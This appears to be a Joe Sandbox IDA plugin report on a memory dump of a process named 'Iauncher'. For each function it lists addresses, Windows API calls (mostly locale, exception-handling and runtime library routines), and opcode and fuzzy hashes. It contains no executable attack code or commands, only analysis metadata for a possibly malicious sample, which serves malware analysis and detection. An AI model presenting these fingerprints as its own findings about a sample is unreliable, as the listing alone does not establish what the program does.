Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e7bdb18b4537b4dafad8a28d0ae7e2956398dd9bf7f8736ba04254e34bffde90
Instruction ID: d4781a8ef87efb928099d655f38a2fc2ae94e52604a1c7f6a2201bc1baa1e098
Opcode Fuzzy Hash: e7bdb18b4537b4dafad8a28d0ae7e2956398dd9bf7f8736ba04254e34bffde90
Instruction Fuzzy Hash: 3031B37590122C9BCB25DF64DD89BCCBBB8AF08310F5041DAE41CA6290EB749FC59F55

Uniqueness

Uniqueness Score: -1.00%

Function 00F1687C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F16892

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 46621f2684ba947e8da6f3c3dcb08199b890d0a1dfbc4d3af1e96631e37a5e15
Instruction ID: 3a26f6b65029213e5b042e4887e35b491c9dc652d7a673aa32c12a725cd9c440
Opcode Fuzzy Hash: 46621f2684ba947e8da6f3c3dcb08199b890d0a1dfbc4d3af1e96631e37a5e15
Instruction Fuzzy Hash: 73518FB1E01209CFEB18CF65D9817AEBBF1FB54320F24852AD445EB261D374D984DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F2960E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684deb9c2f2574f7d91505283bdd3d6d83984e60233b04a04928df00cd44d00c
Instruction ID: d4de0ed5977d196996e08851e2c6f25d86912eb60da4c2a2451f938fd44ce552
Opcode Fuzzy Hash: 684deb9c2f2574f7d91505283bdd3d6d83984e60233b04a04928df00cd44d00c
Instruction Fuzzy Hash: 9F41B2B5C08228AEDB20DF69DC89AEABBB8AF45310F1442D9E418D3201DA759E849F50

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C828 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C87C

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 624afa406101bf169ec8db506a9745e6e8385c41c36f36934d6b02d37f76bd0e
Instruction ID: 914c89bb2932182bff89b4ed1c96be3e8cf0b41e1250ad1a78b6bdf6cddcbdae
Opcode Fuzzy Hash: 624afa406101bf169ec8db506a9745e6e8385c41c36f36934d6b02d37f76bd0e
Instruction Fuzzy Hash: 30216872A152269BDB28DA25EC41FBE73A8EF44314F10807AFD01D7141EB79ED44AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C4AF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

EnumSystemLocalesW.KERNEL32(00F2C5D5,00000001,00000000,?,-00000050,?,00F2CC06,00000000,?,?,?,00000055,?), ref: 00F2C521

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e8814ce3dc645dfeee6b717c5f6e456ae7406451cddea70dfbe70e5d74c6f6b4
Instruction ID: 19517a8bc6ad5b2e9b0b56bc5cbf89b10999c57ef9a3269360dea4ed73cdbe36
Opcode Fuzzy Hash: e8814ce3dc645dfeee6b717c5f6e456ae7406451cddea70dfbe70e5d74c6f6b4
Instruction Fuzzy Hash: 48118C376003005FDB18AF39D8A167EB791FF80368B08442DE94687600D771F902D780

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CA57 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F2C7F1,00000000,00000000,?), ref: 00F2CA83

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1658d02c0e1546185c3e00695c321732a40682d0aa761484fd73c0b5e0def142
Instruction ID: e85646166a2e854df3ec4e6210be4583ec771d56af850913fe8c521d9f1e470b
Opcode Fuzzy Hash: 1658d02c0e1546185c3e00695c321732a40682d0aa761484fd73c0b5e0def142
Instruction Fuzzy Hash: 9BF0F936A0013AAFDB28D621DC26BBE7754EB40764F084425ED06A3140DA79FE41EAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C54A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

EnumSystemLocalesW.KERNEL32(00F2C828,00000001,?,?,-00000050,?,00F2CBCA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F2C594

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 69d9d99d5bf56a7b49732af6c5a7e9a2d181386f2e3de7e211da7e1cacb22b54
Instruction ID: 3f5c8409bc4545e31caeee48f56614dffe87387c7ec5a6384a600b8ce102004e
Opcode Fuzzy Hash: 69d9d99d5bf56a7b49732af6c5a7e9a2d181386f2e3de7e211da7e1cacb22b54
Instruction Fuzzy Hash: B3F0C2367003145FDB149F35AC82A7E7B91EF81768B19842CF9464B690C676ED41EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F257F3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F1D9E4: EnterCriticalSection.KERNEL32(?,?,00F22DB8,?,00F3D418,00000008,00F22F7C,?,?,?), ref: 00F1D9F3

EnumSystemLocalesW.KERNEL32(00F257E6,00000001,00F3D4D8,0000000C,00F25C15,00000000), ref: 00F2582B

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e25d2eecd2a1724a9b06269e04b16652102cf7c5f65a0836d418958e6a3e7934
Instruction ID: 9daeecf3a68bc5611fb163ce034c3772594ac71c85558df67da3604ae219b036
Opcode Fuzzy Hash: e25d2eecd2a1724a9b06269e04b16652102cf7c5f65a0836d418958e6a3e7934
Instruction Fuzzy Hash: 4BF03772A50218DFD700EF98E882B9877B1FB08774F00412AE8109B2A1CBB99945EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C464 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

EnumSystemLocalesW.KERNEL32(00F2C3BD,00000001,?,?,?,00F2CC28,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F2C49B

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f1daea9017041125a8f8fa9b1b040dc7c615e1fd15d73254639170c1fcda7e79
Instruction ID: 2620d7d875b9e94f3cba4e346023c817f3430087fc1ff6b4c3d5f3f45a33632d
Opcode Fuzzy Hash: f1daea9017041125a8f8fa9b1b040dc7c615e1fd15d73254639170c1fcda7e79
Instruction Fuzzy Hash: 20F0E53670021557CB04EF36EC65B7F7F94EFC2774B064059EA0A8B250C676A946E7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F25D19 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F2232C,?,20001004,00000000,00000002,?,?,00F2192E), ref: 00F25D4D

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 22fc2c6038a5bc78c16d9250132d2240b3a6a6798e416ce4557aecc4192c365e
Instruction ID: 9515d4b2249a9d8ba0ca682f7d5b6199cd7fd4c9daef55727a35f559f609c18a
Opcode Fuzzy Hash: 22fc2c6038a5bc78c16d9250132d2240b3a6a6798e416ce4557aecc4192c365e
Instruction Fuzzy Hash: 7CE01A3290492CBBCB122F60EC09A9E7A16AF44B60F018010FD05661218B759E61BA90

Uniqueness

Uniqueness Score: -1.00%

Function 00F16EFB Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006F07,00F16457), ref: 00F16F00

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b6e2ea5df889a667a750506d21842f222b62730382c9597a876afbbbad4acacf
Instruction ID: d0c476248c4cc25aec238b7b568d403f5f6dc491cbb8d9a8c7a7a8f0feaa826e
Opcode Fuzzy Hash: b6e2ea5df889a667a750506d21842f222b62730382c9597a876afbbbad4acacf
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CD88 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F2CD88

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3c6faddcfca631314168ee124315afb306e47011ac8e8dd46c2b3a7ced1844dd
Instruction ID: 6b9cf6ec0d184226e5869f204c4724dda026b73b6a4a5e9ba717ccb018658543
Opcode Fuzzy Hash: 3c6faddcfca631314168ee124315afb306e47011ac8e8dd46c2b3a7ced1844dd
Instruction Fuzzy Hash: BBA01130A022088B83008F30AB08A083AEAAA0A2A23000028A808C0020EB20A080BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00F199E8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F19B07
___TypeMatch.LIBVCRUNTIME ref: 00F19C15
_UnwindNestedFrames.LIBCMT ref: 00F19D67
CallUnexpected.LIBVCRUNTIME ref: 00F19D82

Strings

csm, xrefs: 00F19A92
csm, xrefs: 00F19A25
csm, xrefs: 00F19B3E

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 8ad6abcb285fc4d3f2a77b85ffb1ceab3fe8d8ee677081867fc4dfca1f7d7913
Instruction ID: d7987b7e6bd9daaaa433b56079b2e17a3e7219cbd1f9ea23768e73101efd02d1
Opcode Fuzzy Hash: 8ad6abcb285fc4d3f2a77b85ffb1ceab3fe8d8ee677081867fc4dfca1f7d7913
Instruction Fuzzy Hash: 9DB19A71C08209AFCF28DFA4D8919EEB7B5BF14320F14415AE8516B216C3B8DA91EFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F30C2A Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(007005B0,007005B0,?,7FFFFFFF,?,00F30EFA,007005B0,007005B0,?,007005B0,?,?,?,?,007005B0,?), ref: 00F30CD0
__alloca_probe_16.LIBCMT ref: 00F30D8B
__alloca_probe_16.LIBCMT ref: 00F30E1A
__freea.LIBCMT ref: 00F30E65
__freea.LIBCMT ref: 00F30E6B
__freea.LIBCMT ref: 00F30EA1
__freea.LIBCMT ref: 00F30EA7
__freea.LIBCMT ref: 00F30EB7

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 1adbcfacb1e00edc9b3b78b20a2580d48eb79983e6e4cfe387d9af8c2e57c122
Instruction ID: cda8497e76ad9528a6015d8ce87975c039b389a6e860bfb2fe484e7b6d36663e
Opcode Fuzzy Hash: 1adbcfacb1e00edc9b3b78b20a2580d48eb79983e6e4cfe387d9af8c2e57c122
Instruction Fuzzy Hash: 8E71E572E002199BDF209E94DC61BAF77F69F45770F28055BEC44A7281DF799C80A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F19480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F194B7
___except_validate_context_record.LIBVCRUNTIME ref: 00F194BF
_ValidateLocalCookies.LIBCMT ref: 00F19548
__IsNonwritableInCurrentImage.LIBCMT ref: 00F19573
_ValidateLocalCookies.LIBCMT ref: 00F195C8

Strings

csm, xrefs: 00F1955D

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e011c1301fb0a493541fe16e45fdd9995ef4cc525a9a3399db92584d030a275f
Instruction ID: 1c8a68321eb18e9a6520cef0384a89d4ce87d269b7e1b195dd7f286fe2148163
Opcode Fuzzy Hash: e011c1301fb0a493541fe16e45fdd9995ef4cc525a9a3399db92584d030a275f
Instruction Fuzzy Hash: AF418134A042089BCF11DF68CC50ADE7BE6AF45324F188055E8146B292D775EA95EFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00F2F56E Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2785a1c6cd18acc39959c8b82dea44fceb6b44cdfe8933033d068c3bb6a8746c
Instruction ID: 31cdb9fcacd9e71a2689ec67d2de182e6a70eb42a27bdcc02761b59c724c2c54
